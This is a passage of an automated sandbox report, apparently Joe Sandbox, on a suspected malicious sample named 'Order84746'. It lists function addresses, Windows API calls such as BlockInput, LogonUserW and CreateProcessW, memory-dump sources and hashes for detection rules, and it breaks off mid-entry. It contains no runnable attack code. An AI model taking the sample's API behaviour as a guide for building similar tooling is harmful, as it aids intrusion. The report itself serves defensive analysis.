                          • Opcode ID: 4e80a7bf03afe298596d099b8b5b0e87038213a6d79aaee6d3e40d71ddcb9f1e
                          • Instruction ID: 200fa0ae1e91e4c52cc6afa2cd0b767db748859752afe87f078e495db608f791
                          • Opcode Fuzzy Hash: 4e80a7bf03afe298596d099b8b5b0e87038213a6d79aaee6d3e40d71ddcb9f1e
                          • Instruction Fuzzy Hash: 4121A2726385108BCB29CF28D481A52F7E5EB95320B648E6DE0E5CB2C0CB74BA05DB94
                          Function 0095044C Relevance: 1.6, APIs: 1, Instructions: 64nativeCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 008FB34E: GetWindowLongW.USER32(?,000000EB), ref: 008FB35F
                          • NtdllDialogWndProc_W.NTDLL(?,00000112,?,?), ref: 009504F4
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: DialogLongNtdllProc_Window
                          • String ID:
                          • API String ID: 2065330234-0
                          • Opcode ID: 7a5512a9abddd3985b8fe23488365b781de27fadd6368479d0c1bee47796eb3f
                          • Instruction ID: 9646f458cc9ce8257db51f443451367bb9dbe7ce2256166ebe5fdbbf053ae839
                          • Opcode Fuzzy Hash: 7a5512a9abddd3985b8fe23488365b781de27fadd6368479d0c1bee47796eb3f
                          • Instruction Fuzzy Hash: 56110631204225BAFB28DF2ECC05F7E3658DBC1B21F248714FE129A5F2DA645D14A394
                          Function 009500AF Relevance: 1.5, APIs: 1, Instructions: 46nativeCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 008FB526: GetWindowLongW.USER32(?,000000EB), ref: 008FB537
                          • NtdllDialogWndProc_W.NTDLL(?,00000115,?,?,?,?,?,?,0095E467,?,?,?,?,00000000,?), ref: 00950127
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: DialogLongNtdllProc_Window
                          • String ID:
                          • API String ID: 2065330234-0
                          • Opcode ID: 0151dfa0426ff58d117e27293121d70019d64d80c12cf496680e48319218d4e6
                          • Instruction ID: eaf9686563cdb68520ad32605be6b744ad30b5be48ff7eacb5b0dfbce23dc168
                          • Opcode Fuzzy Hash: 0151dfa0426ff58d117e27293121d70019d64d80c12cf496680e48319218d4e6
                          • Instruction Fuzzy Hash: 9E012831A08114ABDF14CF26CC0ABB93B9AFFC5326F044115FD595B192C331AC24D7A1
                          Function 0094E9AF Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 008FB526: GetWindowLongW.USER32(?,000000EB), ref: 008FB537
                          • CallWindowProcW.USER32(?,?,00000020,?,?), ref: 0094E9F5
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Window$CallLongProc
                          • String ID:
                          • API String ID: 4084987330-0
                          • Opcode ID: c5382f5f7ce9bfbc3003ee0a837cd30c7660c636b3656b1849e821602637b457
                          • Instruction ID: d8f41540ed4d419095867a0e3f9b4bc26bd55d6e545bfeb677599da3ef37b2ff
                          • Opcode Fuzzy Hash: c5382f5f7ce9bfbc3003ee0a837cd30c7660c636b3656b1849e821602637b457
                          • Instruction Fuzzy Hash: 19F03735604108AFCB159F94EC00C793BAAFB09360B048518FA159B6A1CB729860EBA0
                          Function 0094EC7C Relevance: 1.5, APIs: 1, Instructions: 29nativeCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 008FB34E: GetWindowLongW.USER32(?,000000EB), ref: 008FB35F
                            • Part of subcall function 008FB63C: GetCursorPos.USER32(000000FF), ref: 008FB64F
                            • Part of subcall function 008FB63C: ScreenToClient.USER32(00000000,000000FF), ref: 008FB66C
                            • Part of subcall function 008FB63C: GetAsyncKeyState.USER32(00000001), ref: 008FB691
                            • Part of subcall function 008FB63C: GetAsyncKeyState.USER32(00000002), ref: 008FB69F
                          • NtdllDialogWndProc_W.NTDLL(?,00000204,?,?,00000001,?,?,?,0095E514,?,?,?,?,?,00000001,?), ref: 0094ECCA
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: AsyncState$ClientCursorDialogLongNtdllProc_ScreenWindow
                          • String ID:
                          • API String ID: 2356834413-0
                          • Opcode ID: f34de7c64138f8633e6251fc9268b1344283d0eb33dbbcb5df19bba6ec9417e1
                          • Instruction ID: c989cfb64889747970bae35de2548ff9f25aab06ff69f5a0015ff3c17c1a0526
                          • Opcode Fuzzy Hash: f34de7c64138f8633e6251fc9268b1344283d0eb33dbbcb5df19bba6ec9417e1
                          • Instruction Fuzzy Hash: 8AF0A030200228ABDF14AF19DC1AEBE3BA5FF01751F044015FA465A2A1C7B698B0EBD1
                          Function 008FAAFC Relevance: 1.5, APIs: 1, Instructions: 28nativeCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 008FB34E: GetWindowLongW.USER32(?,000000EB), ref: 008FB35F
                          • NtdllDialogWndProc_W.NTDLL(?,00000006,?,?,?), ref: 008FAB45
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: DialogLongNtdllProc_Window
                          • String ID:
                          • API String ID: 2065330234-0
                          • Opcode ID: cc915e5684588ffa1bb5f5fca127ccd9a7143c1e40c8fbec8c29bf8fe5c5c428
                          • Instruction ID: 4dc9adf16d6b4b58817bc312cae3970221870f55ecb6665a7547ef17aa19a1f8
                          • Opcode Fuzzy Hash: cc915e5684588ffa1bb5f5fca127ccd9a7143c1e40c8fbec8c29bf8fe5c5c428
                          • Instruction Fuzzy Hash: 99F08C34614219DFDB28DF19DC25A393BA6FB45371F04421AF9168B2B0E771D960EBA0
                          Function 00936AAF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                          Download Yara Rule
                          APIs
                          • BlockInput.USER32(00000001), ref: 00936ACA
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: BlockInput
                          • String ID:
                          • API String ID: 3456056419-0
                          • Opcode ID: b29885441cac63c136e0d96efe2c8ecd7e0195ca2abf021a683f8bc9db8e55e1
                          • Instruction ID: 4468aaa479f5ed7b7b79ec4b9a4235b15084c67a5242bde777344b4edf677814
                          • Opcode Fuzzy Hash: b29885441cac63c136e0d96efe2c8ecd7e0195ca2abf021a683f8bc9db8e55e1
                          • Instruction Fuzzy Hash: 80E012392102046FC700EF69D404956B7ECEF68751F04C416EA45D7291DAB0F8048BA1
                          Function 009274BB Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                          Download Yara Rule
                          APIs
                          • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 009274DE
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: mouse_event
                          • String ID:
                          • API String ID: 2434400541-0
                          • Opcode ID: 6bdff7ae410f5f4c2bf836cee2ffb2ec99f06aa6d11e2e6efd81946e58f1c807
                          • Instruction ID: 7307a271dca085683b81c5365eef8e312e99b129e7b82c9eb8c1c64f735bb9b7
                          • Opcode Fuzzy Hash: 6bdff7ae410f5f4c2bf836cee2ffb2ec99f06aa6d11e2e6efd81946e58f1c807
                          • Instruction Fuzzy Hash: A8D05EB062D32538EC2C37A4BC0FF76890EF3007C0FC08589B482E94F9B8C46801A032
                          Function 0094F609 Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                          Download Yara Rule
                          APIs
                          • NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 0094F649
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: DialogNtdllProc_
                          • String ID:
                          • API String ID: 3239928679-0
                          • Opcode ID: b35d4963b130028e331f9ee953a504596e8d31655f415a4c6c36c30922459031
                          • Instruction ID: 926c6d9b3ebfbe25a0d080bd41fa58cff024c5b6aa201d2d139663ff65a635f1
                          • Opcode Fuzzy Hash: b35d4963b130028e331f9ee953a504596e8d31655f415a4c6c36c30922459031
                          • Instruction Fuzzy Hash: 15F06D31605399AFDB21EF58DC15FC77B99EB1A720F084009FA21672E1CB706820EBA0
                          Function 008FAB4F Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 008FB34E: GetWindowLongW.USER32(?,000000EB), ref: 008FB35F
                          • NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?), ref: 008FAB7D
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: DialogLongNtdllProc_Window
                          • String ID:
                          • API String ID: 2065330234-0
                          • Opcode ID: eb33deba85d1c28aec961a8396802a185c35e7653192234d0ac86e33d2b857dd
                          • Instruction ID: 6f04a786ea37fa4de989e1367cf7debed75c6536e60161d73cd51eba8ad245ab
                          • Opcode Fuzzy Hash: eb33deba85d1c28aec961a8396802a185c35e7653192234d0ac86e33d2b857dd
                          • Instruction Fuzzy Hash: 81E0C230644308FBCF14AFA4CC11E283B2AFF49314F144008F6058B2A1CB73A422EB40
                          Function 0091B106 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                          Download Yara Rule
                          APIs
                          • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,0091AD3E), ref: 0091B124
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: LogonUser
                          • String ID:
                          • API String ID: 1244722697-0
                          • Opcode ID: 9063aad6b1d6e37284248e20f86a85c2305945b091ad9b2e6e582ee6947dbeac
                          • Instruction ID: debcf6f0358cc7fa87fc0316c332d68d8753ca2b5d7c00d78184eb88015dd4b8
                          • Opcode Fuzzy Hash: 9063aad6b1d6e37284248e20f86a85c2305945b091ad9b2e6e582ee6947dbeac
                          • Instruction Fuzzy Hash: 20D09E321A864EAEDF025FA4DD06EAE3F6AEB04701F448511FA25D50A1C675D531AB50
                          Function 0094F654 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                          Download Yara Rule
                          APIs
                          • NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,0095E4D1,?,?,?,?,?,?), ref: 0094F67F
                            • Part of subcall function 0094E32E: _memset.LIBCMT ref: 0094E33D
                            • Part of subcall function 0094E32E: _memset.LIBCMT ref: 0094E34C
                            • Part of subcall function 0094E32E: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,009A3D00,009A3D44), ref: 0094E37B
                            • Part of subcall function 0094E32E: CloseHandle.KERNEL32 ref: 0094E38D
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
                          • String ID:
                          • API String ID: 2364484715-0
                          • Opcode ID: 500035c18784a6ef7d877bdb8f7596341e46c9f8cbd5e38569b00e2f0f3c12a3
                          • Instruction ID: b1b20b62220001f3385a123fdcf2f489841169a1df42693d6910f28443e19971
                          • Opcode Fuzzy Hash: 500035c18784a6ef7d877bdb8f7596341e46c9f8cbd5e38569b00e2f0f3c12a3
                          • Instruction Fuzzy Hash: 75E04631214209DFCB02DF04DD15E9637A6FB08318F024015FA01472B1C731AC60EF40
                          Function 0094F5AB Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                          Download Yara Rule
                          APIs
                          • NtdllDialogWndProc_W.NTDLL ref: 0094F5D0
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: DialogNtdllProc_
                          • String ID:
                          • API String ID: 3239928679-0
                          • Opcode ID: 091184567c50347d570406022cfddf58c405a36a53f864bdfd3a6faf8e68126f
                          • Instruction ID: 0536c2402b47633442550ee80a839ff9fae15858486194add44490652c292d91
                          • Opcode Fuzzy Hash: 091184567c50347d570406022cfddf58c405a36a53f864bdfd3a6faf8e68126f
                          • Instruction Fuzzy Hash: CDE0173420824CEFCB01DF84DC44E863BA5EB1A314F050054FD058B371C771A830EBA1
                          Function 0094F5DA Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                          Download Yara Rule
                          APIs
                          • NtdllDialogWndProc_W.NTDLL ref: 0094F5FF
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: DialogNtdllProc_
                          • String ID:
                          • API String ID: 3239928679-0
                          • Opcode ID: 20919b5f5c1eb66ca89dee3a93a8d4b9d23d626929ea7740fca1ae7be55bbeb6
                          • Instruction ID: b45c37ca455c64d643589493d74393e9b71a7c7168204d65cbdd744e8e99914d
                          • Opcode Fuzzy Hash: 20919b5f5c1eb66ca89dee3a93a8d4b9d23d626929ea7740fca1ae7be55bbeb6
                          • Instruction Fuzzy Hash: 9FE0E234204248EFCB01DF84D844E863BA5EB1A314F050054FD058B262C772A860EBA1
                          Function 008FB715 Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 008FB34E: GetWindowLongW.USER32(?,000000EB), ref: 008FB35F
                            • Part of subcall function 008FB73E: DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,008FB72B), ref: 008FB7F6
                            • Part of subcall function 008FB73E: KillTimer.USER32(00000000,?,00000000,?,?,?,?,008FB72B,00000000,?,?,008FB2EF,?,?), ref: 008FB88D
                          • NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?,?,008FB2EF,?,?), ref: 008FB734
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Window$DestroyDialogKillLongNtdllProc_Timer
                          • String ID:
                          • API String ID: 2797419724-0
                          • Opcode ID: 8b0f7bdf85d1e30b3a5e0a3329cd06fc0fbef2af47b8be978f622b0e99bb8573
                          • Instruction ID: 232c2d0af9e0ee2ba7f40aa31940b17a88aa14ff2270dd338d0ac0b2bbac6a46
                          • Opcode Fuzzy Hash: 8b0f7bdf85d1e30b3a5e0a3329cd06fc0fbef2af47b8be978f622b0e99bb8573
                          • Instruction Fuzzy Hash: B8D0803068430CB7DB103B74DD07F593E5EEB54750F048010F705AD1E1CBB1542055A5
                          Function 0095B340 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: NameUser
                          • String ID:
                          • API String ID: 2645101109-0
                          • Opcode ID: f075384f87ffa9ce4270e8d5610226c6fa87225994024a9d20e4b73cbda28f55
                          • Instruction ID: 7c93c36f0c777d09e7d34f01557b55c2564a7477013acc6a8ffd64aa74a7d481
                          • Opcode Fuzzy Hash: f075384f87ffa9ce4270e8d5610226c6fa87225994024a9d20e4b73cbda28f55
                          • Instruction Fuzzy Hash: D5C04CB1805109DFC751CBC0CD449EEB7BCAB04301F104195D155F1110D7749B459B76
                          Function 00908189 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                          Download Yara Rule
                          APIs
                          • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0090818F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
